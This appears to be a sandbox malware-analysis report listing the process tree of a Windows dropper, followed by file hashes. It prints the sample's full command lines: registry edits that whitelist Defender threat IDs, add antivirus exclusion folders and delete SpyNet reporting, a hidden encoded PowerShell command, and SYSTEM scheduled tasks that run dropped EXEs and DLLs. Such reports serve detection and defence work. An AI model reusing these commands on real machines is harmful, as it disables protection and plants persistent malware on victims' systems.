C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2972
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:228
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LNUBGVQNDOUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LNUBGVQNDOUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mbQXQWfiU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mbQXQWfiU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pqzHHOUJlDLoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pqzHHOUJlDLoC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yaZvCAUzKqxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yaZvCAUzKqxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NRVKUIgAFoPoXkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NRVKUIgAFoPoXkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TKLYYQlZQscfmQGO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TKLYYQlZQscfmQGO\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:323⤵PID:5004
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:324⤵PID:4668
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:643⤵PID:4660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:323⤵PID:3684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:643⤵PID:3792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:323⤵PID:3600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:643⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:323⤵PID:3544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:643⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:323⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:643⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NRVKUIgAFoPoXkVB /t REG_DWORD /d 0 /reg:323⤵PID:2308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NRVKUIgAFoPoXkVB /t REG_DWORD /d 0 /reg:643⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx /t REG_DWORD /d 0 /reg:323⤵PID:4828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx /t REG_DWORD /d 0 /reg:643⤵PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TKLYYQlZQscfmQGO /t REG_DWORD /d 0 /reg:323⤵PID:3712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TKLYYQlZQscfmQGO /t REG_DWORD /d 0 /reg:643⤵PID:2144
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQemUVuQc" /SC once /ST 06:41:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQemUVuQc"2⤵PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQemUVuQc"2⤵PID:5084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JApWNoHZsVVCavdbE" /SC once /ST 03:21:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\CzSJLdI.exe\" PA /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JApWNoHZsVVCavdbE"2⤵PID:3584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:684
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4080
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2644
-
C:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\CzSJLdI.exeC:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\CzSJLdI.exe PA /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4832 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvlIjxbhjqoskMIGsW"2⤵PID:4572
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1948
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3060
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3440
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mbQXQWfiU\gOkLPo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VifYLfsFUZBOnFr" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VifYLfsFUZBOnFr2" /F /xml "C:\Program Files (x86)\mbQXQWfiU\YNpopAg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VifYLfsFUZBOnFr"2⤵PID:4732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VifYLfsFUZBOnFr"2⤵PID:3340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aHccXdIPUxGykP" /F /xml "C:\Program Files (x86)\yaZvCAUzKqxU2\nJwiuKL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xJAfwssuCzqxd2" /F /xml "C:\ProgramData\NRVKUIgAFoPoXkVB\wcuuvyp.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dOThrINOfEcGPPqKs2" /F /xml "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\udlgYnO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZuMFfllVmyQmxJihDZV2" /F /xml "C:\Program Files (x86)\pqzHHOUJlDLoC\FuYVZxE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WxeKxhacHpvHIAGHf" /SC once /ST 11:52:09 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TKLYYQlZQscfmQGO\PfrLXCTd\JyfwkyC.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WxeKxhacHpvHIAGHf"2⤵PID:3208
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4508
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2660
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4812
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JApWNoHZsVVCavdbE"2⤵PID:2472
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TKLYYQlZQscfmQGO\PfrLXCTd\JyfwkyC.dll",#1 /site_id 5254031⤵PID:3936
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TKLYYQlZQscfmQGO\PfrLXCTd\JyfwkyC.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:388 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WxeKxhacHpvHIAGHf"3⤵PID:1680
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51404da6ddced1565ee59387d9300b831
SHA1a3a36147f67c6092d9ad0306ecd3b80b7674531d
SHA2561ac2d30bd76ecf11f0eb4cad09b7438462ac0f0029be7730436c87233ed6feb7
SHA512737441e3420de4c889637d9597259b91e9afb0ddfa34f84db9199c4092c77d0e5f6056d466f59d55f91df4b92db23c4f1ddd613710e6335c28c001c3db8c5fa2
-
Filesize
2KB
MD5e166b668b2da22c79659ddbf74d19da1
SHA1311c146df4ea6b181c40acf4dc4985262166c71d
SHA256921cfe23daaa50f69b3753309a3995cf736e3b57a9f53c634404d036547e3f36
SHA5127a27291533a3a9535f03014afa1a0da8d8943d52532ff322a67b25dd3b265fb849638a26896a6d33d07b06580b5a1c4c1138e3e8228a750c1d73273044b890f6
-
Filesize
2KB
MD559cfa67be6e00886fc1bd3a70d4e77de
SHA19dc7325d3c0e72c487551f4b2efba2bcd6ce36d7
SHA2565eb782bf60b402bb5720e52e51ed52105675927736dc0add19a01f75076a73ed
SHA51204cadc3b99968a50515a89e386b67a43b44eae326857d825c11b3abcda6ce1b22509b41fe6b6c5ef8e31faa58d2b08f3e03f926750e4ca4979d510aed65b3c74
-
Filesize
2KB
MD5e5a2e1cf1cb6383ac8b516c05d6b7201
SHA124038f9ef629833a032aa170ceb9753da4a4f7e1
SHA256bca96d17681c12264fc1a42a318a13ec40476f047bbf26f14e8a24fa19747273
SHA5127bd851b0378f7f4673bed619ace73a734384e8d7b9c13ec10f94bd383f276813c35987e0357068b44947cdfb1c4457f338734085acc1d126f64ad6861d4be923
-
Filesize
2KB
MD5b143e1456b4ae28cc886299691dc1e95
SHA1bf540b0444ab7979006a9f201b282784572b926c
SHA256f181316c7773d5f34247b17176f1abfd5bc36c6ad484bc614b7237a9d2a5af14
SHA512569750dc67f7fc362dd5450769d5f909b5263424f941b61a326f8154fd75999146813faad95e22b837bdef97b6df0aab2b94935e1e5cf560f11de91044c21e00
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.3MB
MD592de6a594267b9dd35e3937bb44ccfab
SHA15d51c774ecea5eb868c2894e9c8c40e7375f5dde
SHA2569971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
SHA512200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
-
Filesize
6.3MB
